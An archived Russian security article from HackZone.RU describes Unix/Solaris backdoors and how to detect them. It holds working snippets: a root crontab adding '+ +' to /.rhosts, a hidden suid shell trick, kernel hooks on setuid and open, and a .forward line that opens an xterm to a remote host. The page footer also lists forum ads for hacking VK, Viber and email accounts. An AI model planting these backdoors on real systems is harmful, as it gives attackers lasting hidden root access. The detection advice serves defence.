Нажмите CTRL-D чтобы добавить нас в закладки
Внимание! Вы находитесь в незащищенном режиме (HTTP). Для перехода в защищенный режим SSL, нажмите здесь
HackZone.RU - Backdoors -
Войти / Регистрация / Участники
-
Поиск по сайту
Форумы



Реклама

Поиск ТОП Добавить публикацию

Backdoors - "Мертвый компьютер - защищенный компьютер!"

15.06.2008

Обращаем внимание, что данная публикация взята из архива.
Возможно, что информация, изложенная здесь, частично устарела

Введение.

Проникнуть в чужую систему и добиться там root привелегий это еще полдела. Как и в известной игре в "Царя горы", завоеванное нужно удержать. Для этого в систему вносятся небольшие изменения, оставляются программы. Это и есть backdoors. Чтобы найти их в своей системе ( А вдруг они там уже есть?! ;-), необходимо понимать способы их создания. В этом документе я не претендую на описание всех возможных backdoors. Вы можете предложить свой способ и пополнить коллекцию. Все названия относятся к OS Solaris. В других *NIX системах они аналогичны.

Классификация.

Backdoors, дающие привилегии.

Изменение атрибутов файлов.

suid-bit (04000). При запуске программы, имеющей s бит система порождает процесс с эффективным uid равным uid хозяина программы. Таким образом, копия shell, лежащая в удаленном каталоге и имеющая sticky-bit, дает мгновенные права "хозяина" файла, например root.

Атрибуты специальных устройств.

/dev/mem указывает на драйвер для доступа к памяти. Постановка на него атрибутов 0666 дает пользователю возможность прямой записи в память. Злоумышленник может найти proc_t структуру своего процесса и изменить его эффективный uid. {kmem_thief}

Изменение системных файлов.

/var/spool/cron/crontabs/ Cron создает заказанные процессы в установленное время. Взломщик может добавить строку, создающую, например, .rhosts файл в полночь и уничтожающую его утром в файл заданий root.

 

/var/spool/cron/crontabs/root:
0 22 * * 6 "echo '+ +' > /.rhosts"
0 6 * * 1 "rm -rf /.rhosts"
/etc/passwd, /etc/shadow - в этих файлах храниться информация о аккаунтах. Взломщик может добавть в них свои записи или изменить аттрибуты этих файлов для внесения в произвольный момент своей информации.

/var/sadm/install/contents - этот файл хранит информацию о проинсталлированных в системе файлах, их размеры, атрибуты и контрольную сумму. Этот файл может быть изменен для сокрытия модификации программ.

Подмена программ, модификация библиотек.

Программы, имеющие sticky-bit или часто выполняемые администратором системы могут быть модифицированны для внесения изменений в систему при выполнении администратором. E.g:
....
if( !geteuid())
chmod("/var/tmp/.hidden_shell", 0x4555);
....
Аналогичный кусочек может быть вставлен в одну библиотек, например libc. Библиотека libc.a разбирается на обьектные файлы. Необходимая функция модифицируется и компилируется новая динамическая библиотека.

Добавление модулей в ядро.

Взломщик может добавить свой модуль в ядро и перехватить какой-либо из системных вызовов, скажем, SYS_setuid.
SYS_setuid Solaris 2.6
....
proc_t p;
user_t ut;
int my_setuid(uid_t uid)
{
int rval;

p = ttoproc(curthread);
mutex_enter(&p->p_lock);
up = prumap(p);
rval = bcmp(up->u_comm, "devil", 5);
(void)prunmap(p);
mutex_exit(&p->p_lock);
if( rval) {
rval = setuid(uid);
} else {
...
}
return 0;
}
....
Теперь достаточно переименовать свою программу в devil* и вызвать setuid для получения uid = 0.

Специально оставленные программы.

В системе могут быть оcтавлены файлы, такие как passwd крекеры, exploits для suid программ, etc. На не пропатченной системе с помощью exploitов могут быть получены root привелегии за счет выполнения кода в стеке программ имеющих sticky-bit.

Backdoors, дающие доступ к системе.

Введение доверенных отношений

~user/.rhosts, /etc/host.equiv, ~user/.shosts (при установленном SSH)Эти файлы создают доверенные отношения в сети. К ним обращаются демоны in.rlogind, in.rshd, sshd, etc. В файлах оговорены пары компьютер-пользователь которые могут входить в систему минуя схему аутенфикации. Пара '+ +' позволяет вход любого пользователя с любого компьютера без пароля. Наличие файла /.rhosts {+ +} предоставляет возможность войди в систему как root или smtp (uid=0, gid=0). Ограничение на вход пользователя root только с консоли не запрещает удаленный вход пользователя smtp, a /usr/bin/.rhosts дает вход для пользователя 'bin'

~user/.forward в этом файле хранится информация для перенаправления почты. Он может выглядеть например так:

\user
|"/usr/openwin/bin/xterm -display another.host.net:0"

Добавление или модификация демонов.

Системные демоны обычно запускаются при старте системы из /etc/rc?.d/ файлов или при помощи мета-демона inetd. В эти файлы можно добавить старт своего демона. Для затруднения обнаружения посторонних соединений путем прослушивания сети или обмана firewalla чужая программа может использоваться UDP протокол или ICMP пакеты.

Backdoors, маскирующие активность в системе.

Подмена программ.

Замена программ исправленными версиями используется для маскировки своей работы в системе, например, запуска ломалки паролей. Программы изменяются так что бы не показывать активность определенного пользователя, запускаемых им процессов, использование дискового пространства. Наиболее известным из пакетов программ для замены системных утилит является RootKit. {RootKit SunOS, RootKit Linux}

Введение модулей в ядро.

Модули могут перехватывать системные вызовы обращения к файлам, получения информации о системе и сознательно искажать получаемую информацию. Например, при открытии файла "/etc/inetd.conf" будет происходить открытие резервной копии этого файла спрятанной в системе. Таким образом скрывается изменение системных файлов. SYS_open:
SYS_open   Solaris 2.6
...
static char new_path = "/var/tmp/.locks/.idx/inetd.conf";
int my_open(char *fname, int fmode, int cmode)
{
int rval;

rval = bcmp(fname, "/etc/inetd.conf", 16);
if( rval) {
return(copen(fname, (int)(fmode-FOPEN), cmode));
} else {
return(copen(new_path, (int)(fmode-FOPEN), cmode));
}
}
...

Определение backdoors.

Хорошо спрятанный backdoor довольно трудно найти. Вопросы поиска и создания backdoors напоминают "спор брони и снаряда".

Проверка файлов.

Разумным решением является сделать назависимый список системных файлов с их атрибутами и контрольными суммами. Этот список создается после инсталляции новой системы и корректировки ее с помощью aset (SUNWast) или 'fix-modes' by Casper Dik. Проверка файлов в системе можно производить по cron или постоянным процессом с низким приоритетом. Контрольные суммы вычисляемые /bin/sum не являются надежной гарантией безопасности, т.к. легко подбираются. Можно порекомедовать для этих целей MD5. Существует ряд продуктов различных фирм, позволяющих просматривать систему на предмет "странных" файлов, дат, атрибутов.

Контроль сетевых соединений.

Узнать о постороннем доступе в систему можно контролируя сетевой траффик и сканнируя хосты на предмет открытых портов. Существует большое количество как сканеров так и систем контроля за сетевым траффиком. Лучшим решением всегда остается firewall ;-).

Поддержание системы в разумном порядке.

Системы со всеми инсталлированными патчами, отключенными неиспользуемыми сервисами существенно меньше подвержены разрушению, с разумно ограниченным доверием ;-)



by Vyacheslav, roungly@hotmail.com.

При копировании материалов ссылка на HackZone.RU обязательна

Добавить страницу в закладки

 Детали
Категория: Архив
Опубликовал: DiMan
Просмотров: 37747
Проголосовало через SMS: 0
Ключевые слова: rootkit, backdoor, (найти похожие документы)
  Разместить у себя на сайте
Прямая ссылка
HTML
BBCode ссылка
BBCode ссылка с текстом

 Комментарии (оставить свой комментарий можно здесь)
Только зарегистрированные пользователи могут оставлять комментарии

Зарегистрироваться *** Авторизоваться


 Последние новости и статьи  Последние сообщения с форумов
  • В CMS Joomla обнаружена критическая 0-day уязвимость
  • ФБР не смогло взломать протокол шифрования переписки террористов ...
  • Полиция обыскала дом предполагаемого создателя платежной системы ...
  • Google: квантовый ПК будет в 100 млн раз быстрее стандартных чипо...
  • "Лаборатория Касперского" констатирует усиление атак кибергруппир...
  • Microsoft Edge откроет исходные коды ChakraCore
  • Anonymous объявили 11 декабря «днём троллинга» ИГИЛ
  • Миллионы телевизоров, смартфонов и маршрутизаторов оказались уязв...
  • Adobe прощается с Flash
  • У пользователей Viber наблюдаются проблемы

    Все новости... Все статьи... Прислать новость RSS
  • Разное / Ищу работу » Re: Взлом емейлов, вконтакте, одноклассники
  • Разное / Ищу работу » Re: Взлом ВКонтакте на заказ. Взлом почты на заказ.
  • Разное / Предложения работы » Взлом Вк, Viber и почты.
  • Разное / Предложения работы » <<Взлом акков ВК,viber по вменяемой цене&g...
  • Разное / Предложения работы » Взлом Вк, Viber и почты.
  • Разное / Предложения работы » Взлом Вк, Viber и почты.
  • Разное / Ищу работу » Re: Качественный взлом почты (rambler.ru,yandex.ru,gmail.com...
  • Взлом и безопасность / WEB сайтов » Re: Как взломать сайт в котором нет авторизации и пользовате...
  • Взлом и безопасность / WEB сайтов » Re: Как взломать сайт в котором нет авторизации и пользовате...
  • Взлом и безопасность / WEB сайтов » Re: Как взломать сайт в котором нет авторизации и пользовате...

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 2007-2012. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    Ya-Cyt службы мониторинга серверов

    #{title}

    #{text}

    x

    #{title}

    #{text}